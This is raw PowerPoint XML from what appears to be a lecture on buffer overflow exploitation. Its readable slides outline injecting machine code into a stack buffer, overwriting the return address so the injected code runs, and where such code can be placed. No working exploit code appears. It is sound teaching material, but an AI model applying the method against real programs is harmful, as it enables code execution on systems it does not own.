              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="Rectangle 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB6725C-5C96-2841-8CE8-7F1DC1263DFC}"/>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6C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'l'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rectangle 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{453A35DA-871B-C545-8B2D-2F25CEF21339}"/>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72</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'r'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91ABDFFB-654E-DE43-9A9A-F3BA085B778A}"/>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6F</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'o'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3970234-89AA-5D4E-A3B9-E320A5BF972A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1197691"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{515E9875-795D-F34C-A347-50DC2AC7B2AF}"/>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3" name="Rectangle 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18221BD3-D958-D843-8D27-AC85FC92748E}"/>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 name="Rectangle 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644AA429-2F35-A341-8A6D-449112CD844A}"/>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5" name="Rectangle 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB9EFB8-17D4-514F-82EA-55A8885E5C37}"/>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6" name="Rectangle 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22389241-B367-DE49-8D0C-4738EA9580C5}"/>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27" name="Rectangle 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE8B45F-10A2-4149-8798-D3CDDF88D9BD}"/>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28" name="Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321446DE-67D0-664B-A1F5-7E5E88263BBC}"/>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05</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Rectangle 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2931D413-E448-4842-AFD4-4A8382A8295F}"/>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EB</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Oval 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946CA7EA-AA42-1A4F-9E72-75DAE4043D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10352772" y="1233440"/>
            <a:ext cx="1824032" cy="7958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6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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1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5" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertical)">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4" presetClass="entr" presetSubtype="5"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randombar(vertical)">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randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="14" presetClass="entr" presetSubtype="5"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vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="14" presetClass="entr" presetSubtype="5"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randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetID="21" presetClass="entr" presetSubtype="1"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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="35"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54" grpId="0"/>
      <p:bldP spid="56" grpId="0" animBg="1"/>
      <p:bldP spid="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744200" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Five Stages of Exploiting Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED11538D-AB45-8642-92B9-BE0AF10AF9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huh. That’s weird.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whoa. That’s cool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I wonder if I can control that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yes, yes I can.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33849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strips(downRight)">
                                      <p:cBhvr>
                                        <p:cTn id="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Injecting &amp; Executing New Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Content Placeholder 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D8ACA9-E645-4C4B-81EE-B6A7D3C2CC61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="6437727" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write assembly code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine byte representation of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construct string with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“return address” of first injected instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When vulnerable procedure returns, exploit code executes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A36BBC98-0B49-3345-B4AA-6B84F1C78450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C59379-ED95-BD47-B14A-5624D300482D}"/>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6B808C7D-15AF-A84C-8970-FD3B11EA935A}"/>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9" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42B51A09-BB68-624B-A33B-BB39C4CBAB84}"/>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0" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{452188B0-AD60-5247-9BB9-8F96D5F4FD54}"/>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1" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D736A089-520A-0640-A5F9-44F08481EDBE}"/>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B35787DD-9701-454D-A09C-0CD623C45477}"/>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3" name="Straight Arrow Connector 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DBF941-6525-4F43-B898-0B2479E8F60B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="22"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74B9D00-D815-A143-8545-C4E73F25B764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5147021"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB722E97-DF9E-CD46-BF75-88C5B01C2DD0}"/>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AFBCF1E-7558-1F43-9206-C9D6C20E0778}"/>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9CB863-457F-1E43-B3F9-C7D5B4600137}"/>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BA4F04C-C736-9740-9301-26DEF68FB475}"/>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50FC02-E59C-4644-A998-C9B46D0F403D}"/>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8EA02A2-19B2-A042-8DE4-D23C8A5480FD}"/>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10EAEF-74B7-4F43-93EE-1025F045552E}"/>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914C18-A8CD-4F4A-ABE5-CAB10594955C}"/>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CA9A35CA-562F-C343-86F0-B316A37AD23F}"/>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34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE7C1AB-4A8C-8345-8962-CC0837F782A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="33"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40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515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where to Place New Code?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Content Placeholder 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D8ACA9-E645-4C4B-81EE-B6A7D3C2CC61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="5181600" cy="4802187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit code must fit between buffer &amp; return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffers generally large enough for several instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit code must fit between return address &amp; stack bottom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More likely to cause error</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a:xfrm rot="16200000">
            <a:off x="-2229811" y="4259137"/>
            <a:ext cx="4828674" cy="369052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slide by Bohn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A36BBC98-0B49-3345-B4AA-6B84F1C78450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C59379-ED95-BD47-B14A-5624D300482D}"/>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6B808C7D-15AF-A84C-8970-FD3B11EA935A}"/>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9" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42B51A09-BB68-624B-A33B-BB39C4CBAB84}"/>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0" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{452188B0-AD60-5247-9BB9-8F96D5F4FD54}"/>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1" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D736A089-520A-0640-A5F9-44F08481EDBE}"/>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B35787DD-9701-454D-A09C-0CD623C45477}"/>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3" name="Straight Arrow Connector 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DBF941-6525-4F43-B898-0B2479E8F60B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="22"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74B9D00-D815-A143-8545-C4E73F25B764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5147021"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB722E97-DF9E-CD46-BF75-88C5B01C2DD0}"/>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AFBCF1E-7558-1F43-9206-C9D6C20E0778}"/>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9CB863-457F-1E43-B3F9-C7D5B4600137}"/>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BA4F04C-C736-9740-9301-26DEF68FB475}"/>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50FC02-E59C-4644-A998-C9B46D0F403D}"/>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8EA02A2-19B2-A042-8DE4-D23C8A5480FD}"/>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10EAEF-74B7-4F43-93EE-1025F045552E}"/>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914C18-A8CD-4F4A-ABE5-CAB10594955C}"/>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CA9A35CA-562F-C343-86F0-B316A37AD23F}"/>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34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE7C1AB-4A8C-8345-8962-CC0837F782A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="33"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80ADDB45-FA98-3540-879C-D56DABBB1B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429432" y="3986007"/>
            <a:ext cx="750197" cy="1628522"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BC7A5BD-4DDD-0947-A55B-B0906DAD05E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429432" y="455729"/>
            <a:ext cx="750197" cy="2949772"/>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0940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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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5">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>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35">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolv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par>
                                <p:cTn id="27" presetID="9"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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>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35">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>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35">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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P spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="1"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Our attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C24BD71B-BF7F-4D4C-B0F2-FBB4E317BC2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
